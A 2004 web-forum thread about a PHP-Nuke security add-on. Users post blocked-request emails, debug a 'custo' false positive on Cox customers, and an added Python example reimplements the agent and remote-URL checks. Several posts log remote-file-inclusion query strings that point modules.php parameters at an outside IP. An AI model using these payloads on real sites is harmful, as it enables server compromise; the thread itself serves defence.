Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
Posted: Fri Jun 25, 2004 7:42 am
Sentinel traps various harvesters by examining the browser agent that is being used/forged. The list of harvesters is available and maintainable through the Sentinel™ administration panel. It is not always readily apparent why a particular agent gets flagged. There is now a module called Agent Inspector under my Site Navigation menu. Whenever you need an explanation as to what harvester entry trapped the agent that is in the email that Sentinel™ sent you, just use this utility.
Let me know if you find bugs or think it needs enhancing.
Salieri
Hangin' Around
Joined: Nov 07, 2003
Posts: 33
Posted: Fri Jun 25, 2004 8:36 am
Has this feature been implemented in the Sentinel packages?
Sounds great.
Raven
Posted: Fri Jun 25, 2004 8:40 am
In the next release (v2.0) the Agent that trapped it will be included in the Email.
squiresmk
Regular
Joined: May 31, 2004
Posts: 95
Location: NY
Posted: Fri Jun 25, 2004 9:04 am
Sentinel 2.0 is looking extremely awesome.
"There is no obvious match for ==> an obvious match.
If you haven't already, please post the contents of the email you received in one of the Sentinel™ forums."
_________________ Captain of the Internet Debate Team.
dean
Worker
Joined: Apr 14, 2004
Posts: 193
Posted: Fri Jun 25, 2004 9:55 pm
Received this notification and no obvious conclusion was provided by the new Explainer:
Date & Time: 2004-06-25 05:19:52
Blocked IP: 217.160.129.159
User ID: Anonymous (1)
Reason: Abuse - OTHER
--------------------
User Agent: curl/7.7.1 (i686-suse-linux) libcurl 7.7.1 (SSL 0.9.6) (ipv6 enabled)
Query String: alaskandog.com/ipw-web/portal/cms/modules.php?name=http://217.59.104.226/&file=http://217.59.104.226/&album=http://217.59.104.226/&cat=http://217.59.104.226/&pos=http://217.59.104.226/
Forwarded For: none
Client IP: none
Remote Address: 217.160.129.159
Remote Port: 37942
Request Method: GET
xfsunolesphp
Regular
Joined: Aug 23, 2003
Posts: 77
Posted: Fri Jun 25, 2004 10:07 pm
It appears it is trying to hack your site in a bad way.
sharlein
Member Emeritus
Joined: Nov 19, 2002
Posts: 322
Location: On the Road
Posted: Fri Jun 25, 2004 10:11 pm
Would this be considered a False Positive (using Agent Inspector)?
Code:
Agent: User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Cox High Speed Internet Customer) is trapped by this Harvester entry: custo
Thanks, Steve
_________________ Give Me Ambiguity Or Give Me Something Else!
sixonetonoffun
Spouse Contemplates Divorce
Joined: Jan 02, 2003
Posts: 2496
Posted: Fri Jun 25, 2004 10:17 pm
Yep, it would be best to remove custo from the list until we can figure out a way to catch it without killing off every user agent with "customer" or "custom" in it.
_________________ openSUSE 11.4-x86 | Linux 2.6.37.1-1.2desktop i686 | KDE: 4.6.41>=4.7 | XFCE 4.8 | AMD Athlon(tm) XP 3000+ | MSI K7N2 Delta-L | 3GB Black Diamond DDR | GeForce 6200@433Mhz 512MB | Xorg 1.9.3 | NVIDIA 270.30
sharlein
Posted: Fri Jun 25, 2004 10:30 pm
BobMarion
Former Admin in Good Standing
Joined: Oct 30, 2002
Posts: 1037
Location: RedNeck Land (known as Kentucky)
Posted: Fri Jun 25, 2004 10:31 pm
The email above shows that there was a trip in the "Filter" blocker. This is done when someone tries to pass [ Only registered users can see links on this board! Get registered or login! ] through the name variable. Had it not been tripped by a true hack, it would have been tripped by the "libcurl" harvester list string match.
_________________ Bob Marion
Codito Ergo Sum
http://www.nukescripts.net |
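The two checks discussed above, Raven's harvester match on the User-Agent string and the "Filter" trip Bob describes for a URL passed through the name variable, as an added worked example. This is example code written for this page in Python; it is not NukeSentinel's own (PHP) source, and it assumes the following: the harvester list is a constructed sample ("custo" and "libcurl" are the two entries named in the thread; "wget" and "httrack" are filler), the match is a plain case-insensitive substring test, which is what the custo/Customer false positive implies, and the "Custo 3.0" User-Agent used to exercise the stricter matcher is constructed. The remaining inputs are the User-Agent strings and query strings quoted in the emails in this thread.

```python
"""Added illustration of the two checks discussed in this thread: the
User-Agent "harvester" substring match behind the Agent Inspector, and the
"Filter" check that trips when a parameter value is a remote URL.  Example
code written for this page, not NukeSentinel's source; the harvester list is
a constructed sample, not Sentinel's list."""
import re
from urllib.parse import parse_qsl

# Constructed sample harvester list.  "custo" and "libcurl" are the entries
# named in the thread; "wget" and "httrack" are assumed filler entries.
HARVESTERS = ["custo", "libcurl", "wget", "httrack"]


def agent_inspector(user_agent, harvesters=HARVESTERS):
    """Naive case-insensitive substring match, the behaviour the thread
    describes: return the first harvester entry found anywhere inside the
    User-Agent string, or None.  Because it is a bare substring test, the
    entry "custo" also hits "...Cox High Speed Internet Customer"."""
    ua = user_agent.lower()
    for entry in harvesters:
        if entry.lower() in ua:
            return entry
    return None


def agent_inspector_strict(user_agent, harvesters=HARVESTERS):
    """Same lookup, but an entry must match a whole token: no letter or digit
    may sit directly before or after it.  "custo" then still matches a
    User-Agent such as "Custo 3.0" but no longer "Customer" or "custom"."""
    for entry in harvesters:
        pattern = r"(?<![a-z0-9])" + re.escape(entry) + r"(?![a-z0-9])"
        if re.search(pattern, user_agent, re.IGNORECASE):
            return entry
    return None


def filter_inspector(request):
    """Return the names of query parameters whose URL-decoded value is a
    remote URL, the condition described for the "Filter" blocker
    (modules.php?name=http://... is a remote file inclusion attempt).
    Accepts a bare query string or a path/URL with a query part."""
    query = request.split("?", 1)[1] if "?" in request else request
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl has already turned http%3A// back into http://
        if re.match(r"(?i)^\s*(https?|ftp)://", value):
            hits.append(name)
    return hits


def explain(user_agent, request, harvesters=HARVESTERS):
    """Reproduce the "Reason" line of the notification emails as the thread
    shows them: the filter check is evaluated first (reported as
    "Abuse - OTHER") and only if it does not trip does the harvester match
    get a say ("Abuse - AGENT").  Anything else is reported as no match."""
    bad = filter_inspector(request)
    if bad:
        return "Abuse - OTHER (filter: remote URL in " + ", ".join(bad) + ")"
    entry = agent_inspector(user_agent, harvesters)
    if entry:
        return "Abuse - AGENT (harvester entry: " + entry + ")"
    return "no obvious match"


# Inputs taken from the emails and query strings posted in this thread.
CURL_UA = "curl/7.7.1 (i686-suse-linux) libcurl 7.7.1 (SSL 0.9.6) (ipv6 enabled)"
COX_UA = ("Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; "
          "Cox High Speed Internet Customer)")
RFI_QUERY = ("modules.php?name=http%3A//217.59.104.226/&file=http%3A//217.59.104.226/"
             "&p=http%3A//217.59.104.226/")
NEWS_QUERY = "modules.php?name=News&file=article&sid=287&mode=&order=0&thold=0"
# Constructed User-Agent, assumed for the sake of the strict matcher demo.
CUSTO_UA = "Custo 3.0"

if __name__ == "__main__":
    print(explain(CURL_UA, RFI_QUERY))      # filter trips before libcurl is consulted
    print(explain(COX_UA, NEWS_QUERY))      # "custo" false positive on a real browser
    print(agent_inspector_strict(COX_UA))   # None once entries must match whole tokens
    print(agent_inspector_strict(CUSTO_UA)) # custo
```

Run as-is it prints the reason each of the posted requests would have been blocked for. The second matcher shows the trade-off sixonetonoffun raises above: requiring a whole-token match keeps "custo" on the list without catching every agent that merely contains "Customer" or "custom".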
sharlein
Posted: Fri Jun 25, 2004 10:55 pm
That IP listed above appears to be trying to hack a lot of Nuke sites. They tried mine, but Sentinel caught them. Excellent work! Thank you.
Himmel
Regular
Joined: May 08, 2004
Posts: 77
Posted: Sat Jun 26, 2004 4:30 am
Off topic: same IP here... Sentinel saved my website!
On topic: Thanks, Raven, for your Agent Inspector. It's great and easy to use.
Can't wait for 2.0.
GanjaUK
Life Cycles Becoming CPU Cycles
Joined: Feb 14, 2004
Posts: 633
Location: England
Posted: Sat Jun 26, 2004 8:35 am
I got some "abuse" blocked yesterday, same IP again.
Code:
modules.php?name=http://217.59.104.226/&file=http://217.59.104.226/&sid=http://217.59.104.226/
We must all have places in some script kiddie's little black book.
_________________ Need a quality custom theme designed? PM me!
bretonmage
Hangin' Around
Joined: Mar 30, 2004
Posts: 34
Posted: Sat Jun 26, 2004 9:29 am
Yep, even I've got the same hack attempt:
Code:
modules.php?name=http://217.59.104.226/&page=http://217.59.104.226/
modules.php?name=http://217.59.104.226/&pa=http://217.59.104.226/&pid=http://217.59.104.226/
modules.php?name=http%3A//217.59.104.226/&file=http%3A//217.59.104.226/&p=http%3A//217.59.104.226/
modules.php?name=http%3A//217.59.104.226/&file=http%3A//217.59.104.226/&meta=http%3A//217.59.104.226/&cat=http%3A//217.59.104.226/&pos=http%3A//217.59.104.226/
modules.php?name=http%3A//217.59.104.226/&file=http%3A//217.59.104.226/&album=http%3A//217.59.104.226/&pos=http%3A//217.59.104.226/
All in all, I have around 20 of the same hack attempts with that IP.
SmackDaddy
Involved
Joined: Jun 02, 2004
Posts: 268
Location: Englewood, OH
Posted: Sun Jun 27, 2004 11:42 pm
Raven wrote: In the next release (v2.0) the Agent that trapped it will be included in the Email.
So with this being the case, what you are saying is that your Agent Inspector won't be a block you'll need to be releasing, correct?
And I see, according to Bob's site, that 2.0 is *TENTATIVELY* due out in a week or so (July 4th-ish).....so that's good! Thanks for the dedication and efforts of the Sentinel Crew!
Raven
Posted: Mon Jun 28, 2004 4:02 am
That is correct. In v2.0 you should see the Reason more clearly defined in the Admin email.
ConViCT
New Member
Joined: Oct 18, 2002
Posts: 21
Posted: Wed Jul 07, 2004 1:30 pm
I am getting a different Agent-Abuse email; here is where it is pointing to:
mydomain.com/modules.php?name=News&file=article&sid=287&mode=&order=0&thold=0
It is blocking people, but the utility doesn't explain why....
Any ideas?
Thanks,
ConViCt
EDIT NOTE: I use the same string and do not get banned, but people outside are?
Raven
Posted: Wed Jul 07, 2004 1:41 pm
Please post the actual top content of your email but just mask your domain, like this:
Code:
Date & Time: 2004-06-25 05:19:52
Blocked IP: 217.160.129.159
User ID: Anonymous (1)
Reason: Agent
--------------------
Agent: User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Cox High Speed Internet Customer)
Forwarded For: none
Client IP: none
Remote Address: 217.160.129.159
Remote Port: 37942
Request Method: GET
ConViCT
Posted: Wed Jul 07, 2004 1:45 pm
Doh! Sorry about that, here it is:
Date & Time: 2004-07-07 12:11:46
Blocked IP: 68.13.204.14
User ID: Anonymous (1)
Reason: Abuse - AGENT
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Cox High Speed Internet Customer)
Query String: [ Only registered users can see links on this board! Get registered or login! ]
Forwarded For: none
Client IP: none
Remote Address: 68.13.204.14
Remote Port: 1831
Request Method: GET
--------------------
Who-Is for IP
OrgName: Cox Communications Inc.
OrgID: CXA
Address: 1400 Lake Hearn Drive
City: Atlanta
StateProv: GA
PostalCode: 30319
Country: US
NetRange: 68.0.0.0 - 68.15.255.255
CIDR: 68.0.0.0/12
NetName: COX-ATLANTA
NetHandle: NET-68-0-0-0-1
Parent: NET-68-0-0-0-0
NetType: Direct Allocation
NameServer: NS.COX.NET
NameServer: NS.WEST.COX.NET
NameServer: NS.EAST.COX.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2001-11-12
Updated: 2002-08-21
TechHandle: IC146-ARIN
TechName: Cox Communications, Inc
TechPhone: +1-404-269-7626
TechEmail: [ Only registered users can see links on this board! Get registered or login! ]
OrgAbuseHandle: IC146-ARIN
OrgAbuseName: Cox Communications, Inc
OrgAbusePhone: +1-404-269-7626
OrgAbuseEmail: [ Only registered users can see links on this board! Get registered or login! ]
OrgTechHandle: WILLI-ARIN
OrgTechName: Williams, Matt
OrgTechPhone: +1-404-269-7626
OrgTechEmail: [ Only registered users can see links on this board! Get registered or login! ]
Thanks,
ConViCt
Raven
Posted: Wed Jul 07, 2004 2:01 pm
Try using the Agent Inspector on that Agent string. That will tell you why.
ConViCT
Posted: Wed Jul 07, 2004 2:11 pm
Hmmmm, I must be doing something wrong then, as I post it in the Agent Inspector and get this:
There is no obvious match for ==> [ Only registered users can see links on this board! Get registered or login! ]
If you haven't already, please post the contents of the email you received in one of the Sentinel™ forums.
I tried placing the [ Only registered users can see links on this board! Get registered or login! ] before it also, but it gave me the same error.....
What am I doing wrong?
Thanks,
ConViCt
Raven
Posted: Wed Jul 07, 2004 2:20 pm
No, the USER AGENT string
Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Cox High Speed Internet Customer)
ConViCT
Posted: Wed Jul 07, 2004 2:26 pm
Ahhhhhhhh!
Thanks Raven!
But what does "Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Cox High Speed Internet Customer) is trapped by this Harvester entry: custo" mean?
custo?
Huh?
Thanks so much for your help!
ConViCT
Posted: Wed Jul 07, 2004 2:28 pm
Something else I just noticed.... every single block by Sentinel has come from Cox.net...
ConViCT
Posted: Wed Jul 07, 2004 2:34 pm
Never mind, figured it out! Noticed in another post that custo should be removed from the harvester list!
Thanks so much Raven, you rock!
ConViCt